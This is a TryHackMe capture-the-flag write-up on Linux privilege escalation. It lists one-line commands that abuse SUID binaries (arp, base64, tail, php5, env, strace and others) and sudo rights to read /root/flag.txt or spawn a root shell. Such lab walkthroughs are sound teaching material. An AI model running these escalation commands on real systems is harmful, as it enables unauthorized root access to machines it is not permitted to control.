Follow along with this writeup! https://tryhackme.com/room/privescplayground
Hello there, I'm Deskel. This is my first write-up on the THM blog. Today, we are going to explore different ways we can escalate our privileges on a Linux Machine. The creator of the room, SherlockSec, mentioned there are tons of ways to privesc the machine and we're going to explore just a few of them.
Just a small tip, I refer to GTFObin a lot in this challenge. The site contains a list of shell-escaping commands. I break the write-up into two major sections, SUID and SUDO. Without further ado, let's get started!
Click on the link below and deploy the machine, so you can follow along!
Part 1: SUID
SUID exploitation is quite common in Linux especially when users misconfigure the important /bin and /sbin files.
If you want to know more about SUID exploitation, you can refer to this article. However, in short the SUID bit allows a user to run a binary using another users privileges. For example, the passwd binary (that changes your password), needs to run as root in order to make changes to the file system to update your password.
To quickly search on the SUID files on the system file, simply use the following command:
$ find / -perm /4000 2>/dev/null
The perm 4000 represents permission 4000 which is the SUID bit and we are going to ignore all 'permission denied' by using 2>/dev/null/ (sends any errors to a black hole /dev/null). Alternatively, you also can use mnemonic shortcuts.
$ find / -perm /u=s 2>/dev/null
There are tons of programs with the SUID bit to exploit. Always check with the GTFObins site and look for the possible SUID file exploitation. Here is the list of SUID that can be exploited.
For this instance, I'm going to show you the 12 SUID exploitation as a demo and you can figure out the rest using GTFObins. Feel free to deploy the machine on TryHackMe and practise yourself!
The demonstrations below show the process of getting a shell as the root user!
SUID 1: arp
$ /usr/sbin/arp -v -f /root/flag.txt
SUID 2: cut
$ /usr/bin/cut -d "" -f1 /root/flag.txt
SUID 3: Base64
$ /usr/bin/base64 /root/flag.txt | base64 --decode
SUID 4: tail
$ /usr/bin/tail /root/flag.txt
SUID 5: ul
$ /usr/bin/ul /root/flag.txt
SUID 6: shuf
Instead of reading the flag file like the previous SUID, shuf is used to overwrite the file. This SUID command is quite useful to rewrite the configuration file which cannot be done by lower privileged users.
SUID 7: php5
$ /usr/bin/php5 -r "pcntl_exec('/bin/sh');"
SUID 8: file
$ /usr/bin/file -m /root/flag.txt
SUID 9: tclsh
% exec cat /root/flag.txt
SUID 10: env
$ /usr/bin/env /bin/sh
SUID 11: diff
$ /usr/bin/diff --line-format=%L /dev/null /root/flag.txt
SUID 12: strace
$ /usr/bin/strace -o /dev/null /bin/sh
Part 2: Sudo
Another privilege escalation method is seeing what commands you can run as root (administrators often allow users to run certain commands as root). Just small tips here, always check with the ./etc/sudoers file or visudo command to what permissions you've been given.
To check what commands you can run as root, simply punch in the following line.
$ sudo -l
The screenshot above shows you all the commands you can run as the root user, without being asked for a password. We can see this from the (root) NOPASSWD, followed by the binaries we can run..
Actually it is rare to see this kind of stuff in real life. The lower privilege user literally can run anything as sudo. Similarly, you can check the GTFObins for sudo shell-escape.
$ sudo /bin/bash
That's all for the quick write-up for the privesc playground. GTFObins is definitely a useful site to check with the privilege escalation in terms of SUID and SUDO. One more thing, check out mzfr's GTFObins tool, he did a great job on beautifying the tool via terminal.
Hope you enjoyed reading and learnt something new! Until next time :)